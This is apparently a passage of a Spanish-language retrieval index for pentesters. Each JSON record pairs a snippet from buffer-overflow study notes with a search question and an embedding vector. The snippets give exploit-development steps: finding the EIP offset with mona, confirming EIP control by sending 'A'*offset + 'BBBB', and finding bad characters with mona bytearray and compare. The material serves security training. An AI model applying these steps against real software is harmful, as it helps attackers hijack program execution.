0.04608, 0.02545, 0.03154, 0.00986, 0.0865, 0.0214, -0.04534, -0.06087, -0.01706, 0.02443, -0.00187, -0.09283, 0.02536, 0.13023, 0.00986, 0.06629, -0.04216, 0.08295, 0.03476, 0.09866, 0.06956, 0.04049, 0.01437, 0.00509, -0.05868, -0.07183, 0.04461, 0.00899, 0.10612, -0.06872, -0.00584, -0.06605, 0.00334, -0.03646, 0.0352, 0.00258, 0.05083, -0.11251, -0.03201, -0.0438, -0.10177, 0.04566, -0.02962, -0.01903, -0.00605, 0.06234, 0.0254, -0.03307, 0.01354, 0.00252, -0.10097, 0.02795, -0.03724, -0.0357, -0.00532, 0.03447, -0.06012, 0.01554, 0.01544, 0.06387, 0.01932, -0.02647, 0.01016, -0.0489, 0.08172, 0.01264, 0.04827, 0.0041, -0.01212, -0.03162, 0.00526, -0.04547, -0.04796, 0.0455, -0.00073, 0.01185, 0.00074, -0.04702, 0.0488, 0.04096, 0.02721, 0.01554, 0.13339, -0.07821, 0.0248, -0.02602, 0.11788, 0.0157, -0.05551, 0.09583, 0.04375, -0.10036, 0.00843, 0.00891, 0.03663, 0.03784, 0.05764, -0.01836, 0.00359, 0.0777, -0.00345, -0.01966, -0.05233, 0.05534, 0.08385, 0.02732, 0.02296, -0.05801, 0.02189, -0.04345, -0.05185, 0.058, 0.05097, 0.00163, -0.05314, 0.02365, -0.10589, 0.03077, 0.10838, -0.03813, -0.10753, -0.00922, -0.00557, -0.05458, -0.00896, -0.0268, 0.00797, 0.01268, 0.06732, 0.03128, -0.09287, 0.02386, -0.04857]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "ΒΏQuΓ© herramienta sirve para encontrar patrones de EIP cercanos a una direcciΓ³n?", "v": [-0.02237, 0.16381, -0.14579, -0.14691, 0.20786, -0.20192, 0.08579, -0.07748, -0.03075, -0.14327, 0.04395, 0.06262, 0.02573, -0.12515, -0.00558, -0.0369, 0.09347, -0.05235, 0.01717, -0.01652, -0.1059, 0.15773, -0.13347, 0.03888, -0.03829, -0.03484, 0.04699, 0.06263, -0.2182, 0.10676, 0.02967, 0.03508, 0.04441, -0.00953, -0.10493, -0.06649, 0.0392, 0.09883, -0.04863, 0.05399, 0.01045, -0.05697, -0.12003, -0.04642, -0.04994, -0.03938, -0.04451, -0.02819, 0.05069, 0.16066, -0.13149, -0.08239, -0.09943, 0.04832, -0.00287, -0.06157, 0.079, -0.02769, -0.02044, -0.01375, -0.12221, -0.032, 0.00603, -0.04641, 0.0393, -0.14939, -0.00229, -0.0436, -0.1164, -0.11072, -0.07307, -0.02064, -0.02786, -0.00833, -0.0133, 0.02247, -0.00502, 0.04861, 0.07211, 0.01393, 0.10161, 0.01271, -0.07677, -0.02915, -0.10344, -0.01982, 0.03179, -0.01232, -0.06661, -0.15077, 0.00713, 0.11612, -0.02672, 0.09625, -0.01672, -0.02002, -0.04439, 0.01857, -0.03985, 0.0415, 0.07632, -0.05121, -0.08533, 0.07468, 0.05482, -0.00111, 0.02567, -0.07098, -0.08373, 0.00665, 0.0294, -0.02862, -0.0232, -0.02215, -0.03271, 0.00937, -0.02797, -0.00866, -0.03809, -0.04832, -0.00527, 0.01922, -0.04102, 0.01466, -0.03511, 0.06339, 0.04108, 0.13996, 0.08397, -0.03168, -0.02203, -0.03062, -0.08485, 0.00579, 0.06713, -0.02808, 0.03775, -0.03457, 0.03998, -0.04665, 0.03093, -0.07529, -0.01786, -0.12635, 0.01933, -0.05614, 0.07872, -0.07431, -0.03404, 0.04898, -0.01101, -0.06046, -0.00715, 0.03865, 0.01028, -0.01459, -0.01223, 0.01998, -0.12065, 0.01409, 0.01119, -0.03263, 0.06015, -0.0638, 0.00526, -0.05281, 0.01931, -0.01743, 0.08119, -0.04862, -0.01191, 0.0116, 0.00764, -0.05023, -0.01245, -0.08675, -0.06277, -0.00739, 0.04825, -0.0142, -0.01008, 0.0067, -0.03863, -0.00679, 0.04315, -0.03111, 0.12356, 0.04561, 0.02941, 0.02921, -0.00545, -0.08514, 0.02068, -0.12056, -0.00959, -0.01557, -0.02665, -0.02604, -0.02499, -0.02008, -0.04207, 0.01721, -0.04499, -0.05792, 0.08365, 0.07575, -0.03926, -0.00141, -0.02415, 0.01681, -0.03129, 0.0258, 0.08013, -0.01879, -0.06019, -0.06966, 0.03267, 0.02194, -0.01296, 0.06008, -0.01629, -0.04091, 0.07139, -0.03184, 0.0293, 0.01247, 0.05836, -0.0102, 0.03047, -0.04202, 0.02449, 0.01727, 0.05043, -0.03446, 0.00293, -0.04951, 0.02714, -0.02668, -0.03383, -0.01428, 0.02824, 0.03955, 0.06244, -0.02836, -0.00873, -0.06659, -0.00869, -0.0237, -0.03501, -0.04752, -0.04356, -0.01516, 0.03937, -0.00384, 0.01054, -0.00038]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "Con quΓ© puedo analizar la distancia entre una EIP y un patrΓ³n normal?", "v": [-0.12989, 0.25021, -0.10045, -0.04466, 0.01857, -0.00893, 0.1183, 0.03249, -0.20031, 0.00582, 0.08174, 0.09118, 0.01969, 0.00466, -0.02918, -0.03829, 0.06329, 0.00793, 0.0761, -0.00134, -0.03755, -0.05377, -0.08313, -0.06566, 0.14444, 0.05598, -0.06303, 0.15104, -0.02397, -0.03604, -0.12204, 0.10928, 0.12066, -0.03844, -0.03259, 0.06754, -0.00698, 0.18473, -0.03079, -0.04729, -0.01127, -0.03267, -0.00934, -0.06354, -0.00818, -0.06945, -0.07722, -0.05434, 0.05245, 0.08318, -0.13024, -0.03087, -0.05629, 0.00877, -0.08352, 0.08733, -0.00265, 0.0705, 0.10267, 0.00972, 0.02973, 0.01449, 0.05129, -0.00495, 0.10118, -0.09265, -0.03884, 0.03016, -0.09979, -0.06446, -0.00832, 0.01425, -0.19723, -0.01707, 0.09755, 0.12614, -0.03839, 0.04356, 0.10184, 0.04784, 0.0654, 0.03764, -0.05189, -0.00575, -0.06496, -0.00836, -0.0138, -0.05397, 0.00695, -0.06912, 0.05287, 0.0826, -0.01196, -0.02809, -0.0531, -0.12376, -0.05173, 0.0932, -0.07044, 0.12015, 0.04642, -0.01112, -0.06372, 0.07878, 0.04872, 0.05827, 0.06482, -0.01392, -0.01377, -0.07781, -0.05891, -0.00217, -0.08236, -0.09173, -0.09166, -0.08391, -0.0215, -0.00157, -0.06, -0.0497, 0.0029, 0.02026, -0.00175, -0.00492, 0.00084, -0.06232, 0.07441, 0.11556, 0.09537, 0.01608, -0.05384, 0.03719, -0.09047, -0.04498, 0.01944, 0.05606, -0.07497, -0.05067, 0.01617, -0.04907, 0.02301, 0.02459, -0.03008, 0.02788, 0.05873, -0.05063, 0.00031, -0.15723, -0.14196, 0.01088, 0.03634, 0.07056, 0.05698, 0.05701, 0.00464, -0.00435, -0.03215, -0.04323, 0.02741, -0.04098, 0.06292, 0.02099, 0.0442, -0.10253, 0.07879, 0.00653, 0.00089, -0.07824, 0.021, 0.01134, -0.05527, 0.02878, -0.06849, -0.0506, 0.06788, -0.0069, -0.10929, -0.0817, -0.00626, -0.06139, -0.05248, 0.02552, -0.00259, -0.01798, 0.00131, 9e-05, 0.03299, 0.08707, 0.05926, 0.00431, 0.01988, -0.03626, 0.05165, -0.0179, 0.0495, -0.03895, -0.02955, 0.01714, 0.00599, -0.03081, -0.09364, -0.01357, 0.00253, -0.04165, 0.03009, 0.01619, -0.12476, 0.04231, 0.02164, 0.04779, -0.03905, -0.00263, 0.02463, -0.07159, 0.00429, -0.00785, 0.05122, 0.00847, 0.00623, 0.00797, 0.05398, 0.06097, 0.05737, -0.02662, -0.01665, 0.06919, 0.01166, -0.02044, 0.03581, -0.02937, -0.01254, 0.04446, 0.00794, 0.00991, -0.00321, 0.04381, -0.03169, -0.05639, -0.01936, 0.00876, 0.06733, 0.04981, -0.03304, 0.01563, 0.03636, -0.04744, -0.05702, -0.00624, -0.0089, -0.0178, -0.05421, 0.03447, 0.04319, -0.02713, 0.03601, -0.00994]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "Existe alguna alternativa libre como MONA para estudiar desplazamientos de offset?", "v": [0.03458, 0.13032, -0.16136, 0.01054, -0.19693, 0.12403, -0.15784, 0.0013, -0.23481, -0.08681, -0.06997, -0.09639, 0.05999, 0.02498, 0.14204, -0.10411, 0.06877, -0.06796, -0.03692, -0.00857, -0.10666, -0.04082, 0.05758, -0.00348, 0.02819, 0.02135, -0.11086, -0.03645, -0.0718, -0.11744, -0.01412, 0.03133, -0.05557, 0.00614, -0.02423, 0.00356, 0.06402, -0.06665, 0.12326, -0.16864, 0.03955, 0.01437, -0.01305, 0.14947, -0.038, -0.02507, -0.1356, 0.07585, -0.19655, -0.01189, 0.03202, 0.02458, 0.04106, -0.00913, 0.06113, -0.04901, 0.11187, -0.0607, -0.02193, 0.03021, 0.01988, 0.03636, 0.01424, -0.08212, 0.13536, 0.03364, 0.02214, 0.00659, -0.13675, 0.01915, -0.06294, -0.09104, 0.01766, 0.06176, -0.15582, 0.03976, -0.05283, 0.01618, 0.17442, 0.05179, 0.0079, -0.01036, -0.05885, 0.0331, -0.04983, -0.03321, 0.01415, -0.10039, -0.01242, 0.03906, -0.0212, 0.06181, -0.04258, 0.08524, -0.03429, -0.07422, -0.02718, -0.02323, 0.02341, 0.0206, 0.04002, 0.09304, -0.00863, -0.0941, -0.00298, 0.05093, 0.04937, -0.02408, -0.07152, 0.06982, -0.03158, 0.0144, 0.0725, 0.00122, -0.08399, -0.04514, 0.01436, 0.14626, -0.00456, -0.03637, -0.02009, -0.04518, -0.0518, -0.08637, -0.009, 0.01049, 0.00294, 0.03977, -0.04145, -0.02541, 0.06466, -0.07742, -0.04785, -0.03478, -0.12581, -0.01037, 0.08799, 0.01079, 0.04335, -0.03447, -0.02734, -0.01782, -0.03292, -0.05706, -0.01595, -0.00954, 0.05195, -0.02949, -0.01663, -0.06347, -0.10061, -0.0525, 0.0617, 0.04046, 0.04009, 0.07589, 0.01491, -0.03115, -0.04612, 0.03543, -0.00059, 0.00234, 0.02973, -0.04131, 0.03243, -0.05069, 0.02381, -0.00614, -0.00377, 0.08439, -0.04756, 0.09956, 0.04478, -0.10434, 0.01239, -0.09874, -0.00016, -0.02867, -0.01067, -0.02394, -0.00596, 0.07835, -0.01964, -0.04062, 0.06787, 0.05189, 0.05183, 0.00507, 0.01333, -0.01622, 0.00958, 0.04023, 0.00816, -0.05732, -0.04381, -0.02279, -0.00658, -0.03273, 0.07654, -0.05546, -0.06234, -0.0555, 0.08825, -0.08024, -0.02722, 0.03148, -0.01675, 0.00316, -0.034, 0.00944, 0.00158, -0.03568, 0.04258, 0.00354, -0.00488, 0.00185, 0.09056, -0.01859, 0.04137, 0.00537, 0.02278, 0.02794, 0.04008, 0.07792, -0.02084, 0.04138, 0.04741, 0.01232, -0.00932, 0.01962, 0.06065, 0.05372, 0.04423, -0.01443, 0.06689, 0.04214, -0.04118, 0.02028, -0.03408, 0.04774, 0.04286, -0.01273, 0.0017, -0.03693, 0.00627, -0.07028, -0.10323, 0.02677, -0.01753, -0.04538, -0.03191, 0.02582, 0.02736, 0.0453, 0.01127, 0.03445]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 3. Controlar EIP β€” confirmar\nEnvΓ­a `\"A\"*offset + \"BBBB\"` β†’ en el debugger **EIP = 42424242**. Control confirmado.", "indexar": "que herramienta me sirve para controlar o inspeccionar la direcciΓ³n de ejecuciΓ³n EIP?", "v": [-0.13641, 0.13431, -0.18295, -0.24229, 0.19759, -0.22318, -0.05147, 0.04233, 0.02372, -0.05828, -0.00599, -0.00261, 0.08351, -0.16398, 0.0367, 0.01767, 0.15434, -0.14133, -0.04161, -0.03141, -0.06575, 0.09914, -0.01013, -0.00285, -0.05674, 0.08772, -0.10513, 0.05489, -0.18434, 0.01959, -0.01959, 0.12519, 0.05929, -0.08282, -0.03335, 0.01584, -0.02596, 0.02832, 0.02306, 0.13828, -0.06508, 0.02179, -0.08641, -0.00611, 0.04202, -0.04981, 0.05276, 0.04075, 0.00648, 0.09248, -0.0848, -0.0587, -0.1211, 0.06966, -0.03378, -0.02123, 0.07072, -0.1077, 0.05415, -0.0696, -0.06772, 0.00165, 0.04877, 0.03207, 0.04308, -0.06868, 0.03546, -0.11262, -0.08367, -0.02629, -0.0521, 0.05742, -0.02109, 0.06531, 0.0191, -0.11766, -0.04461, 0.07874, 0.03632, -0.014, 0.06073, 0.0052, -0.18006, 0.04403, -0.02545, -0.12935, -0.03978, -0.15334, -0.06415, -0.07934, -0.00593, 0.03494, -0.08668, 0.01817, 0.02121, -0.01977, 0.01823, 0.01458, 0.03291, 0.0359, 0.16305, -0.04396, -0.13832, 0.10619, 0.06073, 0.07286, 0.00273, -0.02376, -0.03317, 0.01576, -0.03296, 0.06828, -0.0252, -0.04595, -0.02218, 0.01848, -0.0257, -0.02998, 0.03696, -0.05788, 0.00063, -0.04232, -0.01641, -0.07635, 0.00745, -0.03658, -0.04349, 0.07347, 0.05648, 0.00497, -0.02086, -0.00892, -0.06584, 0.00187, 0.01991, -0.01932, -0.01615, -0.03609, 0.01, -0.04424, -0.011, -0.02202, -0.00294, -0.1193, 0.03263, -0.09727, 0.03123, -0.0719, 0.02318, 0.04943, 0.05207, -0.08307, 0.0099, 0.01025, 0.02016, 0.01283, -0.04942, 0.04007, -0.0435, 0.09361, -0.02587, -0.02799, -0.00955, -0.01452, 0.0487, -0.02098, 0.01079, 0.02591, 0.04446, -0.00566, -0.02881, 0.01129, 0.02526, 0.01402, -0.02988, -0.13312, -0.02851, -0.01811, 0.02807, -0.00703, -0.02459, -0.01341, -0.0254, 0.0005, 0.01258, -0.01935, 0.00528, 0.06238, 0.03227, 0.05624, 0.04189, -0.00458, 0.01291, -0.11696, -0.00783, 0.02487, 0.00397, -0.0175, -0.01776, -0.02924, 0.02926, 0.00625, -0.01207, -0.04336, 0.05194, 0.0371, 0.00281, 0.03428, 0.00073, 0.0226, 0.03843, 0.0156, 0.04782, 0.00922, -0.03065, -0.08131, 0.07989, 0.02262, -0.02218, 0.03418, 0.05191, -0.05379, 0.09061, -0.01086, -0.00339, 0.03949, 0.0344, 0.00182, 0.02961, -0.00206, -0.02131, -0.01584, 0.01744, 0.00414, 0.01086, -0.07572, 0.02266, -0.02836, -0.04403, -0.05332, -0.01579, 0.06187, 0.01269, -0.02814, -0.05579, -0.03333, -0.03828, -0.00422, 0.00323, -0.04708, -0.01141, 0.02145, 0.04861, -0.01968, -0.0312, -0.02551]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 3. Controlar EIP β€” confirmar\nEnvΓ­a `\"A\"*offset + \"BBBB\"` β†’ en el debugger **EIP = 42424242**. Control confirmado.", "indexar": "cual es una alternativa libre a los debuggers comerciales para modificar registros?", "v": [0.03187, 0.03334, -0.08673, -0.15602, 0.02075, -0.02894, -0.06737, 0.02989, -0.212, -0.10165, -0.05978, -0.17576, -0.03694, -0.11555, 0.14014, -0.05109, 0.01174, -0.10659, 0.10428, -0.04365, 0.06007, -0.04909, -0.00721, -0.03485, -0.03534, -0.05321, -0.03727, -0.11217, -0.09832, 0.06632, -0.00645, -0.07209, 0.081, -0.03788, -0.04371, -0.00345, 0.06816, -0.03817, 0.04873, 0.03614, 0.09311, -0.09737, -0.10287, 0.01688, -0.00624, -0.0485, -0.07717, 0.02809, -0.10594, 0.0378, 0.02571, -0.00321, -0.11505, -0.04239, 0.05916, 0.01263, 0.11094, -0.07844, -0.01094, -0.11636, -0.04327, 0.04387, -0.03313, -0.02859, 0.06682, -0.06046, 0.01214, -0.05404, -0.02401, 0.0617, 0.04034, 0.07464, 0.01065, -0.15354, -0.02991, 0.07098, 0.10083, -0.07492, -0.05671, 0.03021, -0.01789, -0.13276, -0.05096, 0.12466, -0.00284, -0.08501, -0.10381, -0.12297, -0.07364, 0.02904, 0.1295, 0.08231, -0.02734, 0.05776, 0.12355, 0.00311, 0.10203, 0.04888, 0.03401, 0.0916, 0.04045, 0.09102, -0.07734, 0.09047, 0.01579, -0.04302, -0.03286, -0.06167, -0.01682, -0.03477, 0.02764, -0.02688, -0.03727, 0.01531, -0.00555, -0.0147, -0.04915, 0.02511, -0.00461, 0.03025, -0.1009, -0.02631, -0.03591, -0.06078, -0.01374, 0.02725, -0.04977, 0.06601, 0.02664, 0.09026, 0.03467, -0.0362, -0.1029, -0.06949, -0.0332, 0.03464, 0.03258, -0.00538, 0.07495, 0.02899, 0.0226, 0.02517, 0.00264, -0.01011, 0.0969, 0.03265, -0.05822, -0.01321, -0.09974, -0.04054, 0.0456, 0.03269, -0.03253, 0.09186, -0.08838, 0.04881, -0.00224, 0.00107, -0.04766, -0.00298, -0.00518, -0.00432, -0.01884, -0.02173, 0.01158, -0.08223, 0.02504, -0.06772, 0.03668, -0.03578, 0.02484, 0.05595, 0.06143, -0.11719, 0.09182, -0.03294, -0.09904, -0.07561, 0.05932, -0.00484, -0.03234, 0.04726, -0.03105, -0.01656, -0.02365, -0.0175, -0.04569, 0.02573, 0.06057, 0.06067, -0.04342, 0.01777, -0.06187, -0.12716, 0.00599, 0.01149, -0.00948, -0.02492, -0.04142, -0.0637, -0.05114, -0.03845, 0.00202, -0.08161, 0.01758, 0.01082, -0.06337, 0.06621, 0.07235, 0.01316, 0.0189, -0.03786, 0.06675, -0.03942, -0.09451, -0.01524, -0.03817, -0.00869, 0.01589, -0.08074, 0.09369, 0.05062, 0.05452, -0.01844, -0.01784, -0.01265, 0.03878, 0.05675, 0.01988, 0.05345, -0.06256, 0.0934, -0.01787, -0.00448, 0.06094, 0.02754, 0.01463, 0.03026, 0.02765, -0.05986, 0.09293, 0.08441, -0.07991, -0.05349, -0.01988, -0.04345, -0.11035, 0.03718, -0.02816, -0.06992, -0.06303, 0.01587, 0.07848, -0.05159, 0.05921, -0.0404]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 4. Badchars β€” bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "indexar": "quΓ© programa puedo usar para generar secuencias de bytes especΓ­ficos desde cero?", "v": [-0.05812, 0.05645, -0.15368, -0.02856, -0.01145, -0.09949, -0.08205, -0.16242, -0.05794, -0.09196, -0.13164, 0.02182, -0.13511, -0.14105, 0.06489, -0.05611, 0.00615, -0.12841, 0.03441, -0.00302, 0.03844, -0.10394, 0.09064, -0.08488, 0.00467, 0.11068, 0.03022, -0.08407, -0.06784, -0.02578, 0.00051, 0.02445, 0.1254, -0.10308, -0.11653, 0.01913, 0.01196, 0.04208, -0.02405, 0.05191, -0.00425, 0.05893, -0.10824, 0.07069, 0.11866, -0.03655, 0.08319, 0.06646, -0.0638, -0.15062, 0.01121, 0.01032, -0.08637, -0.02814, -0.00228, -0.122, 0.04656, -0.13358, -0.04372, -0.04637, -0.0119, 0.09911, 0.06818, -0.10359, 0.00297, -0.10178, 0.09112, 0.01649, -0.16475, 0.05709, -0.12264, 0.09397, 0.09875, -0.01274, 0.10416, 0.09033, -0.02748, -0.10324, -0.02916, 0.00105, -0.06451, -0.00838, 0.0814, 0.01702, -0.05463, 0.02118, 0.06804, 0.02104, -0.0252, -0.04953, 0.01419, 0.09615, 0.01018, -0.01082, 0.06201, -0.0636, 0.10383, 0.06906, 0.00546, 0.06671, -0.00038, -0.10744, -0.09085, 0.16962, 0.09207, 0.1444, -0.01569, 0.01323, -0.09807, 0.03377, 0.0098, -0.01207, -0.03542, -0.08045, -0.14546, 0.01549, 0.02467, -0.01601, 0.03211, -0.06735, -0.12252, 0.06736, -0.02732, 0.03242, 0.02616, -0.00938, -0.07025, 0.05746, -0.0677, 0.05215, 0.02147, -0.00507, -0.06849, -0.0952, -0.05214, -0.01758, 0.014, -0.04909, -0.00606, 0.01702, 0.02173, 0.07755, -0.02035, 0.05299, 0.06436, -0.01196, -0.00117, -0.1081, -0.05408, 0.03847, 0.0554, -0.04451, -0.03826, -0.03064, -0.10913, 0.01491, 0.00823, -0.07951, -0.05159, -0.02837, -0.04522, -0.03398, -0.05209, -0.01481, 0.08677, -0.0714, -0.07002, 0.04998, 0.0045, 0.08584, -0.00415, 0.0304, 0.03337, -0.07355, 0.01608, -0.00544, -0.11841, -0.04461, -0.04814, -0.02704, -0.05378, 0.00421, 0.02526, 0.01392, -0.0024, -0.01707, 0.00898, 0.03593, 0.04619, 0.08069, -0.04719, 0.07236, 0.05361, 0.01209, 0.00314, -0.05529, 0.00373, 0.01757, 0.00572, 0.00484, -0.02398, 0.03036, 0.04157, 0.04695, 0.10885, 0.0753, -0.03645, -0.01101, 0.02463, 0.04573, -0.00041, -0.01922, -0.02631, 0.07491, -0.06477, -0.01139, -0.02305, 0.06222, 0.04158, 0.01557, 0.03601, -0.01707, 0.0146, 0.0095, -0.01319, -0.05029, 0.02859, 0.02497, -0.02571, 0.02939, -0.00635, 0.00237, -0.05081, 0.01449, 0.03107, -0.00398, -0.0171, -0.03836, -0.02112, -0.02194, -0.00926, 0.09901, -0.02694, -0.0396, -0.01432, -0.01487, -0.0568, 0.04313, -0.03309, -0.0009, -0.0264, -0.0017, -0.01321, -0.04726, 0.01753, 0.03373]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 4. Badchars β€” bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "indexar": "con quΓ© herramienta puedo convertir caracteres en sus correspondientes valores hexadecimales o binarios?", "v": [0.21259, -0.0436, -0.00875, 0.03602, 0.01997, -0.1451, 0.00162, -0.07422, 0.03948, -0.0973, 0.00312, -0.06116, -0.10099, -0.12671, 0.15996, 0.06472, 0.00596, -0.12246, -0.05385, -0.03129, 0.12316, -0.06604, -0.11125, 0.00235, -0.0455, -0.04307, -0.09597, 0.03177, -0.15709, 0.02594, 0.15436, -0.03636, 0.05441, -0.0021, -0.1439, 0.11306, -0.08045, 0.15862, -0.0422, 0.07222, 0.06514, 0.06829, -0.01691, 0.02253, -0.0307, 0.00587, -0.10463, 0.07095, -0.04788, -0.20628, 0.08652, -0.03103, -0.113, -0.05293, 0.04969, -0.10599, 0.13965, -0.01858, -0.04159, -0.12336, 0.09741, 0.09311, 0.11734, -0.04915, -0.08819, -0.02746, -0.00367, -0.00018, -0.14425, 0.05768, -0.0049, 0.10517, -0.01948, -0.0014, 0.03998, 0.02009, -0.01904, -0.09138, 0.0893, -0.03925, 0.03168, 0.00464, -0.01621, -0.05527, 0.02154, 0.02285, 0.00952, -0.05704, 0.02734, -0.03729, 0.0379, 0.04194, -0.04931, 0.01307, -0.00726, -0.066, -0.00895, 0.04512, -0.04461, 0.08749, 0.06241, 0.02814, -0.12053, 0.07606, 0.0968, 0.01475, -0.03468, 0.02549, 0.03039, -0.03127, 0.06448, -0.00835, -0.01437, 0.02726, -0.01831, -0.02341, 0.00606, 0.05506, -0.0354, -0.03614, -0.10974, 0.06327, 0.00431, 0.0257, 0.03619, -0.00118, -0.0082, 0.07025, 0.00848, -0.03062, -0.09898, -0.04553, -0.05531, 0.01075, -0.06235, 0.11525, 0.0919, -0.10566, -0.01136, 0.00991, 0.0309, 0.12004, -0.01473, -0.03138, 0.00883, 0.08592, 0.01083, -0.06146, -0.02309, -0.02669, 0.02028, -0.02723, -0.02245, 0.09958, -0.10247, 0.01144, -0.02132, -0.07394, -0.10384, -0.03676, -0.04519, -0.09749, -0.01327, -0.00806, 0.0237, 0.00249, 0.03727, -0.00178, 0.0501, -0.04867, -0.02521, 0.00876, 0.06941, -0.06732, -0.05602, -0.07755, -0.1336, 0.00587, -0.01358, -0.04263, -0.02731, 0.04695, 0.09152, -0.06293, 0.00854, 0.04134, 0.02328, -0.05575, -0.04616, 0.01083, -0.07315, 0.07301, -0.07502, -0.03188, 0.08315, -0.0218, -0.00948, 0.03078, 0.00032, -0.07792, 0.01675, 0.04415, 0.00323, -0.04706, 0.08323, 0.08514, -0.05763, -0.03124, -0.01086, 0.03406, -0.01799, -0.02577, 0.02845, -0.02474, -0.06286, 0.01556, 0.03268, -0.03524, -0.02659, 0.01105, 0.02401, -0.02907, 0.0302, -0.0651, 0.00561, -0.02792, 0.02452, 0.0551, -0.0288, 0.02774, 0.00415, -0.01346, -0.0412, 0.00394, -0.01122, 0.05596, -0.04998, 0.0008, -0.04491, -0.03251, 0.01721, 0.03315, 0.00156, -0.04726, 0.00379, -0.0159, -0.04925, 0.02979, 0.03054, -0.02651, 0.01356, 0.07081, 0.04115, -0.04861, -0.04646, -0.00766]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 4. Badchars β€” bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "indexar": "necesito una utilidad rΓ‘pida para crear patrones de bytes personalizados, ΒΏme sirve algo como bytearray?", "v": [0.12607, 0.06912, -0.2267, -0.04476, 0.0862, -0.03733, -0.07134, -0.09401, -0.0503, -0.14155, -0.08168, -0.0297, -0.01456, -0.03032, -0.04885, -0.09918, -0.06082, -0.05993, 0.08728, -0.04684, 0.07778, -0.06925, -0.13866, 0.03438, -0.05749, -0.00783, 0.15233, -0.01126, -0.17568, 0.15839, -0.0207, 0.02208, 0.10112, -0.03119, -0.12479, -0.06584, -0.00682, -0.06283, -0.07617, 0.09081, 0.07456, 0.04073, -0.0895, 0.1396, 0.09422, 0.11566, -0.02248, 0.03809, 0.03566, 0.02108, -0.00802, -0.07601, -0.11275, 0.00314, -0.02642, -0.12925, 0.08554, -0.1221, -0.11911, -0.09104, -0.1634, -0.02775, 0.08527, -0.14096, -0.00219, -0.10081, -0.01953, 0.07798, -0.11733, 0.03029, -0.1302, 0.08243, 0.04906, -0.04259, 0.04559, 0.06987, -0.10504, -0.01921, -0.01143, 0.06004, -0.02578, 0.04478, -0.01591, -0.117, -0.01938, 0.08069, 0.03289, 0.03599, 0.02694, -0.06512, 0.08615, 0.07857, 0.00505, 0.03905, -0.01637, 0.02852, 0.08815, 0.04301, 0.04845, 0.08505, 0.00212, -0.08891, -0.0418, 0.09502, 0.05515, 0.05948, -0.02168, -0.01596, -0.02619, 0.05206, 0.11405, 0.04075, 0.04633, 0.01173, -0.0264, -0.0759, 0.03323, -0.00894, -0.10834, 0.07045, -0.04844, -0.06656, 0.07594, 0.01032, -0.05065, 0.02812, -0.00531, 0.03544, -0.01672, 0.03712, 0.0592, -0.03674, -0.06299, -0.08328, -0.05549, 0.08947, 0.02159, -0.07989, 0.0272, -0.02924, 0.04363, 0.00115, -0.07026, -0.01803, 0.02749, 0.08675, 0.0888, -0.02394, -0.08181, 0.02885, 0.06884, -0.00839, -0.04652, -0.03384, -0.06303, -0.05767, -0.04365, -0.07785, -0.07043, 0.02212, -0.01701, -0.02671, 0.04578, -0.04125, -0.04722, -0.12399, -0.02473, 0.02001, 0.0498, 0.05949, -0.04544, -0.03895, -0.02322, -0.09208, 0.10229, 0.03067, -0.06887, 0.01076, 0.0016, -0.03997, 0.04034, -0.04699, -0.01398, 0.0427, -0.00964, -0.04496, 0.08506, 0.03651, -0.01118, 0.01088, -0.0072, 0.0239, 0.05342, -0.00076, 0.00659, -0.05333, 0.0024, 0.00041, 0.01333, -0.06178, 0.06935, -0.009, -0.0566, 0.05467, 0.03383, 0.01636, -0.02443, -0.01524, 0.00447, 0.03077, -0.04138, 0.04902, -0.02397, -0.00185, -0.00688, -0.01081, 0.03999, 0.04028, 0.01074, -0.03871, 0.0088, -0.01296, -0.0015, 0.00528, 0.03385, -0.01043, 0.04447, -0.03727, 0.01121, 0.00879, -0.00506, 0.00518, 0.00072, 0.01646, 0.04854, -0.02673, -0.04803, -0.06214, -0.0363, -0.00918, -0.01083, 0.01804, -0.02178, 0.01621, 0.00335, -0.04732, -0.02314, 0.01984, -0.08348, -0.06492, -0.05038, -0.02447, 0.00046, -0.00398, 0.03934, 0.05059]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta 